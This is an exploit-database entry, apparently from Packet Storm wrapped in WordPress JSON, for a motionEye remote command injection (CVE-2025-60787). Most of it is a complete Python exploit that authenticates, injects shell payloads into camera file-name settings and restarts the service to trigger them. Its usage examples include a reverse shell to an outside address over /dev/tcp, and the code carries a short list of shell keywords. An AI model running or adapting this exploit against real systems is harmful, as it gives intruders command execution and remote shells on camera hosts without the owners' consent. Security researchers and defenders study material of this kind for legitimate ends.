{“lastseen”:”2026-02-18T17:37:27″,”description”:”A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. The issue arises from improper validation and sanitization of user\u2011supplied input within camera configuration parameters. Under certain conditions,…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 motionEye 0.43.1b4 Remote Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:215797″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”=============================================================================================================================================\\n | # Title : motionEye \u2264 0.43.1b4 Remote Command Injection Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits) |\\n | # Vendor : https:\/\/github.com\/motioneye-project\/ |\\n =============================================================================================================================================\\n \\n [+] Summary : A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. \\n The issue arises from improper validation and sanitization of user\u2011supplied input within camera configuration parameters. \\n \\t\\t\\t\\t Under certain conditions, authenticated users can inject crafted input that is later interpreted by the underlying system shell.\\n Successful exploitation may allow arbitrary command execution on the host system running motionEye, potentially leading to full \\n \\t\\t\\t\\t system compromise, data exfiltration, service disruption, or lateral movement within the network.\\n The vulnerability stems from insufficient input handling and unsafe command construction logic when processing configuration values.\\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import requests\\n import sys\\n import time\\n import re\\n import json\\n import logging\\n from typing import Optional, Dict, List, Tuple, Set, Any\\n from urllib3.exceptions import InsecureRequestWarning\\n from requests.exceptions import RequestException, Timeout, ConnectionError\\n \\n requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\\n \\n logging.basicConfig(\\n level=logging.INFO,\\n format='[%(asctime)s] %(levelname)s: %(message)s’,\\n datefmt=’%H:%M:%S’\\n )\\n logger = logging.getLogger(__name__)\\n \\n \\n try:\\n from bs4 import BeautifulSoup\\n BS_AVAILABLE = True\\n except ImportError:\\n BS_AVAILABLE = False\\n logger.warning(\\”BeautifulSoup not installed. HTML parsing will be limited.\\”)\\n logger.warning(\\”Install with: pip install beautifulsoup4\\”)\\n \\n class MotionEyeExploitError(Exception):\\n \\”\\”\\”Custom exception for MotionEye exploit errors.\\”\\”\\”\\n pass\\n \\n class MotionEyeExploit:\\n \\n SESSION_COOKIE_NAMES = {‘session’, ‘motioneye.session’, ‘meye_session’, ‘beaker.session.id’}\\n SUCCESS_INDICATORS = {\\n ‘success’, ‘saved’, ‘updated’, ‘applied’, ‘configuration saved’\\n }\\n \\n def __init__(self, target_url: str, username: str = \\”admin\\”, password: str = \\”\\”, timeout: int = 30):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.default_timeout = timeout\\n self.session = requests.Session()\\n self.session.verify = False\\n self.csrf_token: Optional[str] = None\\n self.cameras: List[Dict] = []\\n self.authenticated = False\\n self.session_cookie_name: Optional[str] = None\\n self.last_command: Optional[str] = None\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0’,\\n ‘Accept’: ‘text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8’,\\n ‘Accept-Language’: ‘en-US,en;q=0.5’,\\n ‘Accept-Encoding’: ‘gzip, deflate, br’,\\n ‘Connection’: ‘keep-alive’,\\n ‘Upgrade-Insecure-Requests’: ‘1’,\\n })\\n \\n def _check_dependencies(self) -\\u003e bool:\\n \\”\\”\\”Check if required dependencies are available.\\”\\”\\”\\n if not BS_AVAILABLE:\\n logger.error(\\”BeautifulSoup is required for reliable HTML parsing.\\”)\\n logger.error(\\”Install it with: pip install beautifulsoup4\\”)\\n return False\\n return True\\n \\n def _extract_csrf_token(self, html_content: str) -\\u003e Optional[str]:\\n \\”\\”\\”\\n Extract CSRF token from HTML content using multiple methods.\\n \\”\\”\\”\\n \\n patterns = [\\n r’name=[\\”\\\\’]csrf_token[\\”\\\\’]\\\\s+value=[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’,\\n r’name=[\\”\\\\’]csrf_token[\\”\\\\’]\\\\s+content=[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’,\\n r’csrf_token[=:]\\\\s*[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’,\\n r’data-csrf-token=[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’,\\n r’var\\\\s+csrf_token\\\\s*=\\\\s*[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’,\\n ]\\n \\n for pattern in patterns:\\n match = re.search(pattern, html_content, re.IGNORECASE)\\n if match:\\n token = match.group(1)\\n logger.debug(f\\”Found CSRF token via regex: {token[:10]}…\\”)\\n return token\\n \\n if BS_AVAILABLE:\\n try:\\n soup = BeautifulSoup(html_content, ‘html.parser’)\\n \\n csrf_input = soup.find(‘input’, {‘name’: ‘csrf_token’})\\n if csrf_input and csrf_input.get(‘value’):\\n return csrf_input[‘value’]\\n \\n meta_tag = soup.find(‘meta’, {‘name’: ‘csrf_token’})\\n if meta_tag and meta_tag.get(‘content’):\\n return meta_tag[‘content’]\\n \\n scripts = soup.find_all(‘script’)\\n for script in scripts:\\n if script.string:\\n var_match = re.search(r’csrf_token\\\\s*=\\\\s*[\\”\\\\’]([^\\”\\\\’]+)[\\”\\\\’]’, script.string)\\n if var_match:\\n return var_match.group(1)\\n except Exception as e:\\n logger.debug(f\\”BeautifulSoup parsing error: {e}\\”)\\n \\n logger.warning(\\”Could not extract CSRF token\\”)\\n return None\\n \\n def _has_valid_session(self) -\\u003e bool:\\n \\”\\”\\”\\n Check if the current session has a valid authentication cookie.\\n \\”\\”\\”\\n if not self.session.cookies:\\n logger.debug(\\”No cookies found in session\\”)\\n return False\\n \\n session_cookies_found = []\\n for cookie_name in self.session.cookies.keys():\\n if cookie_name.lower() in self.SESSION_COOKIE_NAMES:\\n session_cookies_found.append(cookie_name)\\n self.session_cookie_name = cookie_name\\n logger.debug(f\\”Found potential session cookie: {cookie_name}\\”)\\n \\n if session_cookies_found:\\n logger.debug(f\\”Session cookies found: {session_cookies_found}\\”)\\n return True\\n \\n logger.debug(\\”No known session cookie names found\\”)\\n return False\\n \\n def _verify_dashboard_access(self) -\\u003e bool:\\n \\”\\”\\”\\n Verify we can access the dashboard by checking for specific elements.\\n \\”\\”\\”\\n try:\\n response = self._make_request(‘GET’, ‘\/’, timeout=10)\\n if not response or response.status_code != 200:\\n logger.debug(\\”Dashboard access failed: HTTP error\\”)\\n return False\\n \\n if BS_AVAILABLE:\\n try:\\n soup = BeautifulSoup(response.text, ‘html.parser’)\\n \\n dashboard_indicators = [\\n soup.find(‘div’, {‘id’: ‘dashboard’}),\\n soup.find(‘div’, {‘class’: ‘dashboard’}),\\n soup.find(‘div’, {‘data-page’: ‘dashboard’}),\\n soup.find(‘a’, href=re.compile(r’\/camera-\\\\d+’)),\\n soup.find(‘button’, string=re.compile(r’cameras?’, re.I)),\\n soup.find(‘span’, string=re.compile(r’motioneye’, re.I)),\\n ]\\n \\n if any(dashboard_indicators):\\n logger.debug(\\”Dashboard access verified via BeautifulSoup\\”)\\n return True\\n except Exception as e:\\n logger.debug(f\\”BeautifulSoup dashboard verification failed: {e}\\”)\\n \\n dashboard_patterns = [\\n r’dashboard’,\\n r’camera-\\\\d+’,\\n r’motioneye’,\\n r’still_images’,\\n r’movies’,\\n ]\\n \\n for pattern in dashboard_patterns:\\n if re.search(pattern, response.text, re.I):\\n logger.debug(f\\”Dashboard access verified via regex pattern: {pattern}\\”)\\n return True\\n \\n logger.debug(\\”No dashboard indicators found in response\\”)\\n return False\\n \\n except Exception as e:\\n logger.debug(f\\”Dashboard verification error: {e}\\”)\\n return False\\n \\n def _make_request(self, method: str, endpoint: str, **kwargs) -\\u003e Optional[requests.Response]:\\n \\”\\”\\”\\n Make HTTP request with proper error handling and timeout.\\n \\”\\”\\”\\n url = f\\”{self.target_url}{endpoint}\\”\\n \\n if ‘timeout’ not in kwargs:\\n kwargs[‘timeout’] = self.default_timeout\\n \\n max_retries = kwargs.pop(‘max_retries’, 2)\\n \\n for attempt in range(max_retries):\\n try:\\n logger.debug(f\\”Making {method} request to {endpoint} (attempt {attempt + 1})\\”)\\n response = self.session.request(method, url, **kwargs)\\n \\n logger.debug(f\\”Response status: {response.status_code}\\”)\\n logger.debug(f\\”Response headers: {dict(response.headers)}\\”)\\n \\n return response\\n \\n except Timeout as e:\\n logger.warning(f\\”Request timeout to {endpoint} (attempt {attempt + 1}): {e}\\”)\\n except ConnectionError as e:\\n logger.warning(f\\”Connection error to {endpoint}: {e} (attempt {attempt + 1})\\”)\\n except RequestException as e:\\n logger.warning(f\\”Request failed for {endpoint}: {e} (attempt {attempt + 1})\\”)\\n \\n if attempt \\u003c max_retries – 1:\\n wait_time = 1 * (attempt + 1)\\n logger.debug(f\\”Waiting {wait_time} seconds before retry…\\”)\\n time.sleep(wait_time)\\n \\n logger.error(f\\”All {max_retries} attempts failed for {endpoint}\\”)\\n return None\\n \\n def login(self) -\\u003e bool:\\n \\”\\”\\”\\n Authenticate to motionEye and establish session.\\n \\”\\”\\”\\n logger.info(f\\”Attempting login to {self.target_url} as {self.username}\\”)\\n \\n if self._has_valid_session():\\n logger.debug(\\”Found session cookies, verifying dashboard access…\\”)\\n if self._verify_dashboard_access():\\n logger.info(\\”Already have valid session\\”)\\n self.authenticated = True\\n return True\\n else:\\n logger.debug(\\”Session cookies present but cannot access dashboard\\”)\\n \\n response = self._make_request(‘GET’, ‘\/’)\\n if not response:\\n logger.error(\\”Failed to fetch login page\\”)\\n return False\\n \\n self.csrf_token = self._extract_csrf_token(response.text)\\n if not self.csrf_token:\\n logger.error(\\”Could not extract CSRF token from login page\\”)\\n return False\\n \\n logger.debug(f\\”CSRF token extracted: {self.csrf_token[:10]}…\\”)\\n \\n login_data = {\\n ‘username’: self.username,\\n ‘password’: self.password,\\n ‘csrf_token’: self.csrf_token\\n }\\n \\n response = self._make_request(\\n ‘POST’, ‘\/login’, \\n data=login_data, \\n allow_redirects=False,\\n max_retries=1 \\n )\\n \\n if not response:\\n return False\\n \\n login_success = False\\n \\n if response.status_code == 302:\\n location = response.headers.get(‘Location’, ”)\\n if location == ‘\/’ or ‘dashboard’ in location:\\n login_success = True\\n logger.debug(\\”Login success via 302 redirect\\”)\\n \\n elif response.status_code == 200:\\n \\n if self._has_valid_session():\\n login_success = True\\n logger.debug(\\”Login success via session cookie\\”)\\n \\n elif ‘window.location’ in response.text and (‘\/’ in response.text or ‘dashboard’ in response.text):\\n login_success = True\\n logger.debug(\\”Login success via JavaScript redirect\\”)\\n \\n if login_success:\\n \\n if self._verify_dashboard_access():\\n logger.info(\\”Login successful – dashboard accessible\\”)\\n self.authenticated = True\\n return True\\n else:\\n logger.warning(\\”Login seemed successful but dashboard not accessible\\”)\\n \\n if self._has_valid_session():\\n self.authenticated = True\\n return True\\n else:\\n logger.error(f\\”Login failed. Status code: {response.status_code}\\”)\\n \\n return False\\n \\n def get_cameras(self, force_refresh: bool = False) -\\u003e bool:\\n \\”\\”\\”\\n Fetch list of available cameras from the dashboard.\\n \\n Args:\\n force_refresh: If True, clear existing camera list before fetching\\n \\”\\”\\”\\n if force_refresh:\\n self.cameras.clear()\\n logger.debug(\\”Cleared existing camera list\\”)\\n elif self.cameras:\\n logger.debug(f\\”Using cached camera list ({len(self.cameras)} cameras)\\”)\\n return True\\n \\n logger.info(\\”Fetching list of cameras\\”)\\n \\n if not self.authenticated and not self.login():\\n logger.error(\\”Not authenticated\\”)\\n return False\\n \\n response = self._make_request(‘GET’, ‘\/’)\\n if not response:\\n return False\\n \\n cameras_found = set() \\n \\n if BS_AVAILABLE:\\n try:\\n soup = BeautifulSoup(response.text, ‘html.parser’)\\n \\n camera_links = soup.find_all(‘a’, href=re.compile(r’^\/camera-\\\\d+’))\\n for link in camera_links:\\n camera_id = link.get(‘href’).strip(‘\/’)\\n if camera_id and camera_id not in cameras_found:\\n camera_name = link.get_text().strip()\\n self.cameras.append({\\n ‘id’: camera_id,\\n ‘name’: camera_name or camera_id\\n })\\n cameras_found.add(camera_id)\\n \\n camera_divs = soup.find_all(‘div’, {‘data-camera-id’: True})\\n for div in camera_divs:\\n camera_id = div.get(‘data-camera-id’)\\n if camera_id and camera_id not in cameras_found:\\n self.cameras.append({\\n ‘id’: camera_id,\\n ‘name’: div.get(‘data-camera-name’, camera_id)\\n })\\n cameras_found.add(camera_id)\\n \\n camera_options = soup.find_all(‘option’, value=re.compile(r’^camera-\\\\d+’))\\n for option in camera_options:\\n camera_id = option.get(‘value’)\\n if camera_id and camera_id not in cameras_found:\\n self.cameras.append({\\n ‘id’: camera_id,\\n ‘name’: option.get_text().strip() or camera_id\\n })\\n cameras_found.add(camera_id)\\n \\n except Exception as e:\\n logger.error(f\\”Error parsing cameras with BeautifulSoup: {e}\\”)\\n \\n if not self.cameras:\\n logger.debug(\\”Using regex fallback for camera detection\\”)\\n camera_matches = re.findall(r’\/camera-(\\\\d+)’, response.text)\\n for camera_num in set(camera_matches): \\n camera_id = f\\”camera-{camera_num}\\”\\n self.cameras.append({\\n ‘id’: camera_id,\\n ‘name’: f\\”Camera {camera_num}\\”\\n })\\n \\n if not self.cameras:\\n logger.warning(\\”No cameras found, using default ‘camera-1’\\”)\\n self.cameras.append({‘id’: ‘camera-1’, ‘name’: ‘Default Camera’})\\n \\n logger.info(f\\”Found {len(self.cameras)} unique camera(s): {[c[‘id’] for c in self.cameras]}\\”)\\n return True\\n \\n def _escape_for_transport(self, command: str) -\\u003e str:\\n \\”\\”\\”\\n Escape a command for safe transport in HTTP POST data.\\n This ensures the command is properly transmitted, not escaped for shell.\\n \\”\\”\\”\\n \\n escaped = command.replace(‘\\\\\\\\’, ‘\\\\\\\\\\\\\\\\’).replace(‘\\”‘, ‘\\\\\\\\\\”‘).replace(\\”‘\\”, \\”\\\\\\\\’\\”)\\n \\n dangerous_chars = [‘`’, ‘$’, ‘(‘, ‘)’, ‘|’, ‘\\u0026’, ‘;’, ‘\\u003c’, ‘\\u003e’, ‘*’, ‘?’, ‘[‘, ‘]’, ‘{‘, ‘}’]\\n found_chars = [c for c in dangerous_chars if c in command]\\n \\n if found_chars:\\n logger.info(f\\”Command contains shell metacharacters: {found_chars}\\”)\\n logger.debug(\\”These are INTENTIONAL for command injection\\”)\\n \\n return escaped\\n \\n def _check_response_success(self, response: requests.Response) -\\u003e Tuple[bool, str]:\\n \\”\\”\\”\\n Check if a response indicates successful configuration update.\\n Returns (success, message)\\n \\”\\”\\”\\n \\n if response.status_code not in [200, 201, 202, 204, 302]:\\n return False, f\\”HTTP {response.status_code}\\”\\n \\n try:\\n json_data = response.json()\\n if isinstance(json_data, dict):\\n \\n if json_data.get(‘status’) == ‘ok’:\\n return True, \\”JSON status: ok\\”\\n if json_data.get(‘success’) is True:\\n return True, \\”JSON success: true\\”\\n if json_data.get(‘error’):\\n return False, f\\”JSON error: {json_data[‘error’]}\\”\\n except (json.JSONDecodeError, ValueError):\\n \\n pass\\n \\n response_text = response.text.lower()\\n \\n error_patterns = [‘error’, ‘fail’, ‘invalid’, ‘denied’, ‘forbidden’]\\n has_error = any(pattern in response_text for pattern in error_patterns)\\n \\n if has_error:\\n \\n success_found = any(indicator.lower() in response_text for indicator in self.SUCCESS_INDICATORS)\\n \\n if success_found:\\n \\n logger.warning(\\”Response contains both success and error indicators\\”)\\n return False, \\”Ambiguous response (both success and error)\\”\\n else:\\n return False, \\”Error indicators found\\”\\n \\n for indicator in self.SUCCESS_INDICATORS:\\n if indicator.lower() in response_text:\\n return True, f\\”Found indicator: {indicator}\\”\\n \\n if response.status_code == 302:\\n location = response.headers.get(‘Location’, ”)\\n if ‘success’ in location.lower() or ‘saved’ in location.lower():\\n return True, f\\”Redirect to: {location}\\”\\n \\n return False, \\”No success indicators found\\”\\n \\n def inject_payload(self, camera_id: str, command: str) -\\u003e bool:\\n \\”\\”\\”\\n Inject malicious payload into camera configuration.\\n \\n safe_command = self._escape_for_transport(command)\\n \\n payload_variants = [\\n f\\”$({safe_command}).%Y-%m-%d-%H-%M-%S\\”, \\n f\\”`{safe_command}`.%Y-%m-%d-%H-%M-%S\\”, \\n f\\”;{safe_command};.%Y-%m-%d-%H-%M-%S\\”, \\n f\\”|{safe_command}|.%Y-%m-%d-%H-%M-%S\\”, \\n ]\\n \\n logger.info(f\\”Injecting payload into camera: {camera_id}\\”)\\n \\n response = self._make_request(‘GET’, ‘\/’, timeout=10)\\n if response:\\n token = self._extract_csrf_token(response.text)\\n if token:\\n self.csrf_token = token\\n logger.debug(\\”Refreshed CSRF token\\”)\\n \\n endpoints = [\\n f\\”\/{camera_id}\/config\/set\\”,\\n \\”\/config\/set\\”,\\n f\\”\/{camera_id}\/edit\\”,\\n \\”\/config\/update\\”,\\n \\”\/settings\/camera\\”,\\n ]\\n \\n for endpoint in endpoints:\\n for idx, payload in enumerate(payload_variants):\\n logger.debug(f\\”Trying endpoint: {endpoint} with payload variant {idx + 1}\\”)\\n \\n data = {\\n ‘still_images_image_file_name’: payload,\\n ‘movie_file_name’: payload, \\n ‘timelapse_file_name’: payload,\\n }\\n \\n if self.csrf_token:\\n data[‘csrf_token’] = self.csrf_token\\n \\n headers = {}\\n if self.csrf_token:\\n headers[‘X-CSRFToken’] = self.csrf_token\\n \\n response = self._make_request(‘POST’, endpoint, data=data, headers=headers)\\n if not response:\\n continue\\n \\n success, message = self._check_response_success(response)\\n if success:\\n logger.info(f\\”Payload injected successfully via {endpoint}\\”)\\n logger.debug(f\\”Success message: {message}\\”)\\n return True\\n \\n logger.debug(f\\”Endpoint {endpoint} returned: {message}\\”)\\n \\n logger.error(f\\”Failed to inject payload through any endpoint for camera {camera_id}\\”)\\n return False\\n \\n def restart_motion(self) -\\u003e bool:\\n \\”\\”\\”\\n Attempt to restart motion service through various endpoints.\\n \\”\\”\\”\\n logger.info(\\”Attempting to restart motion service\\”)\\n \\n if not self.authenticated and not self.login():\\n logger.error(\\”Not authenticated\\”)\\n return False\\n \\n restart_endpoints = [\\n (‘\/action\/restart’, ‘POST’, {}),\\n (‘\/action\/restart_motion’, ‘POST’, {}),\\n (‘\/action\/restart_all’, ‘POST’, {}),\\n (‘\/config\/restart’, ‘POST’, {}),\\n (‘\/restart’, ‘GET’, {}),\\n (‘\/api\/restart’, ‘POST’, {‘Content-Type’: ‘application\/json’}),\\n ]\\n \\n for endpoint, method, headers in restart_endpoints:\\n logger.debug(f\\”Trying {method} {endpoint}\\”)\\n \\n data = {}\\n if self.csrf_token and method == ‘POST’:\\n data[‘csrf_token’] = self.csrf_token\\n \\n try:\\n if method == ‘POST’:\\n response = self._make_request(‘POST’, endpoint, data=data, headers=headers)\\n else:\\n response = self._make_request(‘GET’, endpoint, headers=headers)\\n \\n if response:\\n \\n if response.status_code in [200, 202, 204, 302]:\\n logger.info(f\\”Restart triggered via {endpoint}\\”)\\n return True\\n else:\\n logger.debug(f\\”Endpoint {endpoint} returned {response.status_code}\\”)\\n except Exception as e:\\n logger.debug(f\\”Error with {endpoint}: {e}\\”)\\n continue\\n \\n logger.warning(\\”Could not trigger restart automatically\\”)\\n return False\\n \\n def verify_exploit(self, expected_file: str = \\”\/tmp\/pwned_verified\\”) -\\u003e bool:\\n \\”\\”\\”\\n Verify if the exploit was successful by checking for expected evidence.\\n Returns True if verification succeeded, False if failed or inconclusive.\\n \\”\\”\\”\\n logger.info(\\”Verifying exploit success…\\”)\\n \\n if self.last_command and ‘touch’ in self.last_command:\\n \\n touch_match = re.search(r’touch\\\\s+([^\\\\s;|\\u0026]+)’, self.last_command)\\n if touch_match:\\n expected_file = touch_match.group(1)\\n logger.info(f\\”Looking for created file: {expected_file}\\”)\\n \\n filename = expected_file.split(‘\/’)[-1] if ‘\/’ in expected_file else expected_file\\n \\n web_paths = [\\n f\\”\/motion\/{filename}\\”,\\n f\\”\/static\/{filename}\\”,\\n f\\”\/media\/{filename}\\”,\\n f\\”\/{filename}\\”,\\n ]\\n \\n for web_path in web_paths:\\n response = self._make_request(‘GET’, web_path, timeout=10)\\n if response and response.status_code == 200:\\n logger.info(f\\”Found expected file at {web_path}\\”)\\n return True\\n \\n logger.info(\\”=\\” * 60)\\n logger.info(\\”MANUAL VERIFICATION REQUIRED:\\”)\\n logger.info(f\\”Target: {self.target_url}\\”)\\n logger.info(f\\”Command executed: {self.last_command or ‘unknown’}\\”)\\n logger.info(f\\”Expected evidence: {expected_file}\\”)\\n logger.info(\\”\\\\nTo verify on Docker:\\”)\\n logger.info(f\\” docker exec motioneye ls -la {expected_file}\\”)\\n logger.info(\\”\\\\nTo verify on system:\\”)\\n logger.info(f\\” ls -la {expected_file}\\”)\\n logger.info(\\”\\\\nTo verify via web (if accessible):\\”)\\n logger.info(f\\” curl -k {self.target_url}\/motion\/\\”)\\n logger.info(\\”=\\” * 60)\\n \\n return False \\n \\n def run(self, command: str) -\\u003e Dict[str, bool]:\\n \\”\\”\\”\\n Execute the full exploit chain.\\n Returns dictionary with status of each step.\\n \\”\\”\\”\\n results = {\\n ‘login’: False,\\n ‘cameras’: False,\\n ‘injection’: False,\\n ‘restart’: False,\\n ‘verification’: False,\\n ‘overall’: False\\n }\\n \\n self.last_command = command \\n \\n logger.info(\\”=\\” * 60)\\n logger.info(\\”Starting motionEye RCE exploit\\”)\\n logger.info(f\\”Target: {self.target_url}\\”)\\n logger.info(f\\”Command: {command}\\”)\\n logger.info(\\”=\\” * 60)\\n \\n if not self._check_dependencies():\\n logger.error(\\”Dependencies check failed\\”)\\n return results\\n \\n if not self.login():\\n logger.error(\\”Login failed. Exiting.\\”)\\n return results\\n \\n results[‘login’] = True\\n \\n if not self.get_cameras():\\n logger.error(\\”Failed to get camera list\\”)\\n return results\\n \\n results[‘cameras’] = True\\n \\n injection_success = False\\n for camera in self.cameras:\\n if self.inject_payload(camera[‘id’], command):\\n injection_success = True\\n break\\n \\n if not injection_success:\\n logger.error(\\”Failed to inject payload into any camera\\”)\\n results[‘injection’] = False\\n return results\\n \\n results[‘injection’] = True\\n \\n if self.restart_motion():\\n results[‘restart’] = True\\n wait_time = 10\\n logger.info(f\\”Waiting {wait_time} seconds for command execution…\\”)\\n time.sleep(wait_time)\\n \\n results[‘verification’] = self.verify_exploit()\\n results[‘overall’] = injection_success \\n logger.info(\\”=\\” * 60)\\n logger.info(\\”Exploit execution completed\\”)\\n logger.info(f\\”Results: {results}\\”)\\n logger.info(\\”=\\” * 60)\\n \\n return results\\n \\n def main():\\n \\”\\”\\”\\n Main function with argument parsing.\\n \\”\\”\\”\\n import argparse\\n \\n parser = argparse.ArgumentParser(\\n description=\\”MotionEye \\u003c= 0.43.1b4 RCE Exploit (CVE-2025-60787)\\”,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n %(prog)s -t http:\/\/192.168.1.100:8765 -c \\”touch \/tmp\/pwned\\”\\n %(prog)s -t https:\/\/motioneye.local -c \\”id \\u003e \/tmp\/output\\” -v\\n %(prog)s -t http:\/\/localhost:9999 -c \\”bash -i \\u003e\\u0026 \/dev\/tcp\/10.0.0.1\/4444 0\\u003e\\u00261\\” –dangerous\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘-t’, ‘–target’, required=True,\\n help=’Target URL (e.g., http:\/\/127.0.0.1:8765)’)\\n parser.add_argument(‘-u’, ‘–username’, default=’admin’,\\n help=’Username (default: admin)’)\\n parser.add_argument(‘-p’, ‘–password’, default=”,\\n help=’Password (default: empty)’)\\n parser.add_argument(‘-c’, ‘–command’, \\n default=’touch \/tmp\/pwned_by_exploit’,\\n help=’Command to execute (default: touch \/tmp\/pwned_by_exploit)’)\\n parser.add_argument(‘-v’, ‘–verbose’, action=’store_true’,\\n help=’Enable verbose output’)\\n parser.add_argument(‘–dangerous’, action=’store_true’,\\n help=’Acknowledge that the command may be dangerous’)\\n parser.add_argument(‘–camera’, help=’Specific camera ID to target (default: auto-detect)’)\\n parser.add_argument(‘–timeout’, type=int, default=30,\\n help=’Request timeout in seconds (default: 30)’)\\n \\n args = parser.parse_args()\\n \\n if args.verbose:\\n logger.setLevel(logging.DEBUG)\\n \\n dangerous_patterns = [‘bash -i’, ‘nc ‘, ‘reverse’, ‘shell’, ‘exec’, ‘\/dev\/tcp\/’]\\n if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous:\\n logger.warning(\\” Command appears to be potentially dangerous!\\”)\\n logger.warning(\\”Use –dangerous flag to proceed with this command\\”)\\n sys.exit(1)\\n \\n exploit = MotionEyeExploit(\\n target_url=args.target,\\n username=args.username,\\n password=args.password,\\n timeout=args.timeout\\n )\\n \\n try:\\n results = exploit.run(args.command)\\n \\n if results[‘overall’]:\\n if results[‘verification’]:\\n logger.info(\\” Exploit fully successful – command execution verified\\”)\\n sys.exit(0)\\n else:\\n logger.info(\\” Exploit likely successful – manual verification required\\”)\\n sys.exit(2) \\n else:\\n logger.error(\\” Exploit failed\\”)\\n sys.exit(1)\\n \\n except KeyboardInterrupt:\\n logger.info(\\”\\\\nExploit interrupted by user\\”)\\n sys.exit(130)\\n except Exception as e:\\n logger.error(f\\”Unexpected error: {e}\\”)\\n if args.verbose:\\n import traceback\\n traceback.print_exc()\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :======================================================================\\n jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n ====================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215797″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215797\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T17:37:27″,”description”:”A remote command injection vulnerability exists in motionEye versions up to and including 0.43.1b4. The issue arises from improper validation and sanitization of user\u2011supplied input…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-41406","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n